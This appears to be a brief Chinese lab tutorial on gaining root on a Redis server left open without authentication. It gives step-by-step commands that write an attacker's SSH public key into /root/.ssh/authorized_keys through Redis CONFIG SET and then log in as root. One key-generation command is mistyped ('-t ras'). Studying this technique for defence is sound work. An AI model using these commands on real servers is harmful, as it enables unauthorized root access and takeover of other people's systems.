#redis未授权访问漏洞
当redis服务器出现未授权访问问题,使用一台客户机利用未授权访问缺陷拿到redis服务器的root权限(采用ssh密钥对方式,往redis服务器中存放黑客主机的公钥,黑客主机可以使用自己的私钥直接登录redis服务器)
-
详细步骤
-
将配置文件中的bind监听注释,将受保护模式关掉
#bind 127.0.0.1 -::1 protected-mode no
-
在客户机上创建ssh密钥对
ssh-keygen -t ras
-
在服务器root下创建.ssh
mkdir .ssh
-
在客户机上将id_rsa.pub的值存入文件中,添加空格防止乱码
[root@centOS-2 ~]# (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
-
将key.txt的值写入靶机中
[root@centOS-2 ~]# cat ~/.ssh/key.txt | redis-cli -h 192.168.29.134 -p 6370 -x set xxx
-
将xxx文件放入对应目录
192.168.29.134:6370> CONFIG SET dir /root/.ssh/ 192.168.29.134:6370> CONFIG SET dbfilename authorized_keys
-
测试连接
[root@centOS-2 ~]# ssh root@192.168.29.134 Last login: Tue Nov 29 23:36:15 2022 from 192.168.29.129
-